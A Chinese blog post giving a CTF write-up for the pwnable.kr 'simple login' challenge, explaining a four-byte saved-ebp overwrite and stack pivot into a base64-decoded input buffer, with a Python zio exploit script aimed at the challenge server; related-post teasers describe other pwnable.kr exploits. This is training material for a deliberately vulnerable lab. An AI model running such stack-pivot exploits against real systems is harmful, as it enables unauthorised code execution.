pwnable.kr simple login writeup

最新推荐文章于 2022-03-25 20:33:58 发布
最新推荐文章于 2022-03-25 20:33:58 发布
阅读量1.2k 收藏
点赞数
分类专栏: CTF--逆向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxx_nico/article/details/48533225
版权

pwnable.kr simple login writeup

虽然说是pt150但是还是让我学到很多东西的。这是一个判定特定字符串的程序,直接说溢出点吧。输入的字符会经过一个base64解码,溢出点在auth的memcpy,只能够有4个字节的溢出,这么少怎么弄?
这里写图片描述
参考了大神思路。http://www.cnblogs.com/anewid/p/4567242.html
我们只能溢出4个字节,那就是ebp,ebp里面存放着什么呢,是上个函数的esp,栈顶,再结合每次函数结束的时候都必须的操作,.

leave; ==>mov esp,ebp; pop ebp;

retn; ==>pop eip;

    对于我们这里来说就应该是这样的,main函数调用了auth函数,我们来把ebp改了,就把auth返回到main函数之后的esp改了,这样的话如果我们能够控制esp的位置是我们可写的话,就可以控制main函数的retn的地址了。刚好我们的输入在bss段,于是猥琐的思路来了。

from zio import *
import base64
call_system = 0x08049284
input_addr = 0x811eb40
#target='./login'
target=('pwnable.kr',9003)
def exp(target):
    io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
    io.gdb_hint()
    io.read_until(':')
    payload = 'aaaa' + l32(call_system) + l32(input_addr)
    io.writeline(base64.b64encode(payload))
    io.interact()
exp(target)
dreaming_waiting
关注
专栏目录
pwnable.krsimple login
Jason_ZhouYetao的博客
07-14 627
这题与之前所作的题目不同,不同点在于这题不存在ssh连接至其他的服务器,需要自己在脚本中体现。 首先,下载文件,放到IDA里跑一跑(这里说明,要注意下载下来的文件是32位还是64位的文件,这关系到能不能正确打开并得到反汇编代码的问题),得到main函数的伪代码: int __cdecl main(int argc, const char **argv, const char **envp) ...
pwnable.krsimplelogin
bluestar628的博客
12-09 352
这道题目还是很有意思的。是自从参加了一次pwn培训之后的第一道题目,感觉确实比以前舒服多了。 下载题目,IDA反汇编,基本逻辑很简单,输入一个字符串,进行base64解密,然后比对长度,如果超过12个就直接报错。 漏洞点找了很久,这个漏洞点确实很巧妙。开始的时候,checksec了一下。 发现开启了栈执行保护,和缓冲区溢出保护。所以直接放弃了栈溢出这个思路,
pwnable.kr-random-Writeup
airfish20000的博客
02-08 375
MarkdownPad Document pwnable.kr-random-Writeup 与前几题套路相同,ssh远程登录,ls -l查看文件及权限,cat获得C代码如下: 1 #include 2 3 int main(){ 4 unsigned int random; 5 random = rand(); // random va
pwnable.kr [Rookiss] - [simple login]
Re:Umiade.tr
03-23 1368
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 Rookiss 初体验就从相对熟悉的逆向这一块开始好了。下载好文件后发现是 elf 64 ,在虚拟机上简单跑一跑,要求输入一个 Authenticat
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1764
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 699
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 944
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
Pwnable.kr题目Writeup持续更新~
iqiqiya的博客
03-12 2261
题目地址:https://pwnable.kr/play.php 第一题[fd]: Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu....
PWN uaf [pwnable.kr]CTF writeup题解系列13
重新启程
01-02 733
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@mypwn:/ctf/work/pwnable.kr# ssh uaf@pwnable.kr -p2222 uaf@pwnable.kr's password: ____ __...
pwnable.kr-fix
r00tnb的博客
02-28 872
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include <stdio.h> // 23byte shellcode from http://shell-storm...
Pwnable.kr simple login
BengDouLove的博客
03-18 286
程序的逻辑是,首先输入s,最大三十个字节(这里没有溢出),然后base64解密,解密后的明文存在v4,长度存在v6, 后面判断v6不能大于12,判断成功后将v4复制到input变量,,之后进入auth函数 inout auth函数第一句的memcpy感觉就很突兀,把input复制给v4(这是autn里的v4),后面根本没有用到v4,从这个角度看这句话应该也有点问题,,, 因为前面判断了,所以inp...
pwnable.krsimple login详解
Bill
04-26 2127
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
pwnable 笔记 Rookiss - simple login - 50 pt
HiTaQini
12-16 2009
通过栈溢出控制EBP,从而控制ESP,最后控制EIP,获得对程序的控制权
pwnable_simple_login
z1r0的博客
03-25 507
pwnable_simple_login 查看保护 上面图片可以看到有个溢出,一直溢出到了ebp。也就是说我们可以控制ebp,那如何控制ret_addr呢? 其实我们可以伪造一个假的内存块的地址,这个地址里里面放一个伪造的ebp和返回地址及参数,让程序认为伪造了一个正确的ret_addr。 from pwn import * import base64 context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0'
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1753
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwnable.kr 2.collision writeup
ditto的博客
12-12 503
拿到题目 先连上去。 ls查看目录得到 cat 查看下col.c的源代码 #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; //这里将...
pwnable.kr simple login
you_need_me的博客
06-02 270
点击打开链接
栈溢出之 pwnable.kr login
jiuweideqixu的博客
08-28 296
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 反编译main函数 通过main函数的第21行我们知道,解码之后的字符串也被存放在了input指向的内存单元中。同时我们知道,input在bss段。 反编译Base64Decode函数 反编译auth函数 通过查看auth函数,我们发现很难通过.
pwnable.kr-cmd1 writeup
Yale的博客
02-05 275
看看源码 在main中可以看到我们输入的参数可以通过调用system执行 但是在传给system执行前,输入的内容会被filter处理 而filter过滤了tmp,flag,sh这些关键字 而且还有一点需要注意的是,我们绕过filter之后,还得注意main中的putenv,它将PATH环境变量设置为了乱七八糟的东西 PATH决定了shell将到哪些目录中寻找命令或程序,PATH的值...
2020 YCBCTF羊城杯官方Writeup:PHP与Web安全解题技巧实录
- login, bytecode, easyre, babyreWE: 逆向工程技巧,挑战者需分析和理解二进制文件、字节码或登录系统的内部逻辑。 7. CRYPTO和CRYPTO相关挑战: - CRYPTO部分涉及密码学技术,如RSA加密、GCM模式加密和密钥...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值